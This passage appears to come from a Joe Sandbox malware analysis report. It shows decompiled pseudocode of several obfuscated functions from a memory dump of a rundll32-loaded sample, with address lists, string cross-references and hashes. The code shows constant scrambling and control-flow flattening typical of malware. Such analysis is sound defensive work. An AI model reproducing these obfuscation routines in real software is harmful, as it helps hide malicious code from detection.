											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E007A42C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E007B8F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}

0x007b473c
0x007b473f
0x007b4749
0x007b4751
0x007b475a
0x007b475c
0x007b4760
0x007b4768
0x007b4770
0x007b4778
0x007b4780
0x007b4788
0x007b4793
0x007b4798
0x007b479e
0x007b47a3
0x007b47ab
0x007b47b8
0x007b47bb
0x007b47bf
0x007b47c7
0x007b47cf
0x007b47d7
0x007b47db
0x007b47e0
0x007b47e1
0x007b47e5
0x007b47ed
0x007b47f5
0x007b4803
0x007b4807
0x007b480f
0x007b481c
0x007b4820
0x007b4828
0x007b4830
0x007b4838
0x007b4840
0x007b4848
0x007b4850
0x007b4858
0x007b4862
0x007b4866
0x007b486e
0x007b4876
0x007b487e
0x007b4886
0x007b488e
0x007b489b
0x007b489f
0x007b48a7
0x007b48af
0x007b48b4
0x007b48b9
0x007b48c1
0x007b48c9
0x007b48d1
0x007b48d9
0x007b48e1
0x007b48e9
0x007b48f1
0x007b48f9
0x007b4901
0x007b4909
0x007b4910
0x007b4915
0x007b491d
0x007b4925
0x007b492d
0x007b4935
0x007b4944
0x007b4947
0x007b494b
0x007b4955
0x007b4959
0x007b4961
0x007b4969
0x007b4971
0x007b4976
0x007b497e
0x007b498e
0x007b4992
0x007b499a
0x007b49a2
0x007b49aa
0x007b49b2
0x007b49ba
0x007b49bf
0x007b49c7
0x007b49cf
0x007b49d7
0x007b49df
0x007b49eb
0x007b49ee
0x007b49f2
0x007b49f6
0x007b49fa
0x007b4a03
0x007b4a0b
0x007b4a13
0x007b4a18
0x007b4a20
0x007b4a28
0x007b4a28
0x007b4a28
0x007b4a2b
0x007b4a3d
0x007b4b36
0x007b4b3b
0x007b4b3d
0x007b4b42
0x007b4b44
0x00000000
0x007b4b44
0x007b4a43
0x007b4a49
0x007b4b16
0x00000000
0x007b4a4f
0x007b4a55
0x007b4af9
0x007b4aff
0x007b4b07
0x007b4b04
0x007b4b04
0x007b4b0c
0x007b4b0f
0x00000000
0x007b4a5b
0x007b4a61
0x007b4aea
0x007b4aef
0x007b4af2
0x00000000
0x007b4a63
0x007b4a65
0x007b4ab7
0x007b4abe
0x007b4ac4
0x007b4ac7
0x007b4acc
0x007b4ace
0x007b4acf
0x007b4acf
0x00000000
0x007b4a67
0x007b4a6d
0x007b4b71
0x007b4b77
0x00000000
0x00000000
0x007b4a73
0x007b4a8f
0x007b4a91
0x007b4a9b
0x007b4aa0
0x00000000
0x007b4aa0
0x007b4a6d
0x007b4a65
0x007b4a61
0x007b4a55
0x007b4a49
0x007b4b86
0x007b4b86
0x007b4b5c
0x007b4b61
0x007b4b64
0x007b4b69
0x007b4b70
0x00000000
0x007b4b70

Strings

mU`, xrefs: 007B49A2
^T, xrefs: 007B47CF

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^T$mU`
API String ID: 0-1245783925
Opcode ID: 7574e5e6aad1260d369927aa60470dcdb12b1f1166e01cf003c044cb5a55005e
Instruction ID: 02f1889f31035867d568e1887833895c37dc37d4f8ecead47c379e02f7071fbb
Opcode Fuzzy Hash: 7574e5e6aad1260d369927aa60470dcdb12b1f1166e01cf003c044cb5a55005e
Instruction Fuzzy Hash: F1B130715093409FC358CF25898A55BFBE1FBC8748F108A1DF69AA6261D3B5CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 007BA666 Relevance: 2.7, Strings: 2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007BA666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E007BDCF7(_v148, 0x7a1540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E007AA42D(0xab2a8d8a, 0x2b7)))();
								E007AA8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E007B0AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E007A80E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E007B8519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E007A7FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E007A4816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}

0x007ba666
0x007ba666
0x007ba670
0x007ba674
0x007ba67e
0x007ba68b
0x007ba68f
0x007ba694
0x007ba699
0x007ba6a1
0x007ba6a9
0x007ba6b1
0x007ba6b9
0x007ba6c1
0x007ba6c6
0x007ba6ce
0x007ba6d6
0x007ba6de
0x007ba6e6
0x007ba6ea
0x007ba6ef
0x007ba6f7
0x007ba706
0x007ba709
0x007ba70d
0x007ba715
0x007ba71d
0x007ba722
0x007ba732
0x007ba736
0x007ba73e
0x007ba746
0x007ba74e
0x007ba756
0x007ba75e
0x007ba766
0x007ba76e
0x007ba776
0x007ba783
0x007ba786
0x007ba78a
0x007ba792
0x007ba79a
0x007ba7a2
0x007ba7aa
0x007ba7b2
0x007ba7ba
0x007ba7c2
0x007ba7cf
0x007ba7d3
0x007ba7db
0x007ba7e3
0x007ba7eb
0x007ba7f3
0x007ba7f8
0x007ba800
0x007ba810
0x007ba818
0x007ba81b
0x007ba81f
0x007ba827
0x007ba82f
0x007ba83c
0x007ba842
0x007ba847
0x007ba84f
0x007ba857
0x007ba85c
0x007ba864
0x007ba86c
0x007ba874
0x007ba879
0x007ba881
0x007ba890
0x007ba891
0x007ba895
0x007ba89d
0x007ba8ab
0x007ba8af
0x007ba8b3
0x007ba8b7
0x007ba8bb
0x007ba8c3
0x007ba8cb
0x007ba8cb
0x007ba8cb
0x007ba8d0
0x007ba8d0
0x007ba8de
0x007ba983
0x007ba98c
0x007ba994
0x007ba99b
0x007ba9a7
0x007ba9a8
0x007ba9a9
0x007ba9aa
0x007ba9b6
0x007ba9c2
0x007ba9c7
0x00000000
0x007ba8e4
0x007ba8ea
0x007ba952
0x007ba957
0x007ba95f
0x007ba969
0x007ba96a
0x007ba96b
0x007ba96d
0x007ba972
0x007ba977
0x007ba977
0x007ba97a
0x007ba97a
0x00000000
0x007ba8ec
0x007ba8f2
0x007ba93f
0x00000000
0x007ba8f4
0x007ba8fa
0x007baa1d
0x007ba900
0x007ba906
0x00000000
0x007ba90c
0x007ba910
0x007ba91f
0x007ba920
0x007ba926
0x007ba930
0x007ba936
0x007ba93a
0x00000000
0x007ba93a
0x007ba906
0x007ba8fa
0x007ba8f2
0x007ba8ea
0x007baa26
0x007baa2f
0x007baa2f
0x007ba9e8
0x007ba9ea
0x007ba9ed
0x007ba9ef
0x007ba9f8
0x007ba9fc
0x007baa01
0x00000000
0x007ba9f1
0x007ba9f1
0x00000000
0x007ba9f1
0x00000000
0x007baa06
0x007baa06
0x007baa06
0x00000000
0x007baa12

Strings

^4?, xrefs: 007BA881
iQ, xrefs: 007BA6C6

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^4?$iQ
API String ID: 0-3971506469
Opcode ID: 50b5149b62e91f3fba76fd86451779ae121e84f17636b14cde0b08858fc7a603
Instruction ID: 72fda12b68d9974b9dc4b5533fabc6595ffddf819b7edc3d54a4f5f38d7ea4bb
Opcode Fuzzy Hash: 50b5149b62e91f3fba76fd86451779ae121e84f17636b14cde0b08858fc7a603
Instruction Fuzzy Hash: 7CA16271908340AFC354DF29C58990BFBE1BBC4758F40892DF99AA6260D7B9D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 007B8BE3 Relevance: 2.7, Strings: 2, Instructions: 204
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E007B8BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x7c3e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E007A80E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E007BD25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E007B0AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E007A80E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E007B0AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E007A80E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E007A80E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}

0x007b8be9
0x007b8bf9
0x007b8bfa
0x007b8c01
0x007b8c04
0x007b8c05
0x007b8c06
0x007b8c0c
0x007b8c13
0x007b8c16
0x007b8c1d
0x007b8c24
0x007b8c2b
0x007b8c32
0x007b8c40
0x007b8c47
0x007b8c4a
0x007b8c4d
0x007b8c54
0x007b8c5b
0x007b8c69
0x007b8c6c
0x007b8c73
0x007b8c7a
0x007b8c81
0x007b8c85
0x007b8c8c
0x007b8c93
0x007b8c9a
0x007b8c9e
0x007b8ca5
0x007b8cac
0x007b8cb4
0x007b8cb7
0x007b8cba
0x007b8cc1
0x007b8ccf
0x007b8cd2
0x007b8cd9
0x007b8ce0
0x007b8ce7
0x007b8cee
0x007b8cf5
0x007b8cff
0x007b8d02
0x007b8d05
0x007b8d0c
0x007b8d13
0x007b8d17
0x007b8d1e
0x007b8d25
0x007b8d2c
0x007b8d33
0x007b8d3a
0x007b8d3e
0x007b8d42
0x007b8d49
0x007b8d50
0x007b8d57
0x007b8d5b
0x007b8d64
0x007b8d6b
0x007b8d78
0x007b8d7b
0x007b8d7e
0x007b8d85
0x007b8d93
0x007b8d96
0x007b8d9d
0x007b8da4
0x007b8dae
0x007b8db1
0x007b8db4
0x007b8dbb
0x007b8dc2
0x007b8dc9
0x007b8dd0
0x007b8dd7
0x007b8dde
0x007b8de5
0x007b8dec
0x007b8df7
0x007b8dfa
0x007b8e01
0x007b8e08
0x007b8e0f
0x007b8e16
0x007b8e1a
0x007b8e1e
0x007b8e25
0x007b8e25
0x007b8e33
0x007b8ef3
0x007b8efc
0x007b8efd
0x007b8eff
0x007b8f01
0x007b8f0b
0x00000000
0x007b8f0b
0x007b8e3f
0x007b8e8c
0x007b8e91
0x00000000
0x007b8e91
0x007b8e47
0x00000000
0x00000000
0x007b8e57
0x007b8e5c
0x007b8e62
0x007b8e67
0x007b8e68
0x007b8e69
0x007b8e6b
0x007b8e70
0x007b8e73
0x007b8e76
0x007b8e7d
0x007b8e7e
0x007b8e81
0x007b8e81
0x007b8ea2
0x007b8ea7
0x007b8ead
0x007b8eb2
0x007b8eb3
0x007b8eb5
0x007b8eb7
0x007b8ebc
0x007b8ec2
0x007b8ec8
0x007b8ec9
0x007b8eca
0x007b8ecc
0x007b8ed1
0x007b8ed4
0x007b8ed7
0x007b8ede
0x007b8edf
0x007b8ee2
0x007b8ee5
0x007b8ee5
0x00000000

Strings

ulG, xrefs: 007B8BE9
wV, xrefs: 007B8C0C

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ulG$wV
API String ID: 0-391097709
Opcode ID: 23b7f520af20a1246e89f3c73c67023002b50caae59622931ce07ff4b37c4622
Instruction ID: 53a4af3c482953b1ad5c9fb11cb91f15dedeefc16cb441c2676822ab0f5ca5b6
Opcode Fuzzy Hash: 23b7f520af20a1246e89f3c73c67023002b50caae59622931ce07ff4b37c4622
Instruction Fuzzy Hash: 1D917471D00219EBDB54CFE9D88AADEBBB1FF44314F20810AE212BA290D7B40A45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 007A6D24 Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E007A6D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E007A9DCF(_v532, _v584, _v580,  &_v524,  &_v524, E007A4EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E007BDCF7(_v556, 0x7a1000, __eflags);
							_t173 =  *0x7c3e10; // 0x0
							_t188 =  *0x7c3e10; // 0x0
							E007A47CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E007AA8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E007AB6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}

0x007a6d2a
0x007a6d34
0x007a6d3c
0x007a6d41
0x007a6d49
0x007a6d51
0x007a6d56
0x007a6d5b
0x007a6d63
0x007a6d75
0x007a6d7a
0x007a6d80
0x007a6d88
0x007a6d90
0x007a6d98
0x007a6da0
0x007a6da8
0x007a6db0
0x007a6db5
0x007a6dbd
0x007a6dc5
0x007a6dd2
0x007a6dd5
0x007a6dd9
0x007a6de1
0x007a6de9
0x007a6df1
0x007a6dfb
0x007a6dff
0x007a6e07
0x007a6e0f
0x007a6e17
0x007a6e1f
0x007a6e27
0x007a6e2f
0x007a6e37
0x007a6e3f
0x007a6e47
0x007a6e4f
0x007a6e54
0x007a6e5c
0x007a6e64
0x007a6e6c
0x007a6e74
0x007a6e7c
0x007a6e84
0x007a6e94
0x007a6e98
0x007a6ea0
0x007a6ea8
0x007a6eb0
0x007a6eb8
0x007a6ec4
0x007a6ec7
0x007a6ecb
0x007a6ed3
0x007a6edb
0x007a6ee0
0x007a6ee8
0x007a6ef0
0x007a6efa
0x007a6f08
0x007a6f15
0x007a6f1e
0x007a6f23
0x007a6f2b
0x007a6f38
0x007a6f3c
0x007a6f44
0x007a6f44
0x007a6f4e
0x00000000
0x007a701e
0x007a6f56
0x007a6f68
0x007a6f71
0x007a6f79
0x007a6f8a
0x007a6fa2
0x007a6fb2
0x007a6fc1
0x007a6fc6
0x007a6fc9
0x00000000
0x007a6fc9
0x007a6f5e
0x00000000
0x00000000
0x007a6f64
0x007a6f64
0x007a6fe0
0x007a6fe7
0x007a6fe9
0x007a6fec
0x007a6fee
0x007a6fee
0x007a6fee
0x00000000

Strings

Gx\, xrefs: 007A6F3C
e2, xrefs: 007A6E6C

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gx\$e2
API String ID: 0-3912940318
Opcode ID: 6fc80a608b3cc8b1b4104b6e198346ab156bc6d8ea40c87bf1f63af2e14ca9c3
Instruction ID: 8ef590dd058122cb88d4a5c8f61fc9ce6262ceafca1f1c958f008e35bb1c6b14
Opcode Fuzzy Hash: 6fc80a608b3cc8b1b4104b6e198346ab156bc6d8ea40c87bf1f63af2e14ca9c3
Instruction Fuzzy Hash: 717131711083419FC768CF25D88A81FBBF1FBC5758F209A1DF29696260D3B5894ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 007AA55F Relevance: 2.7, Strings: 2, Instructions: 159
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E007AA55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
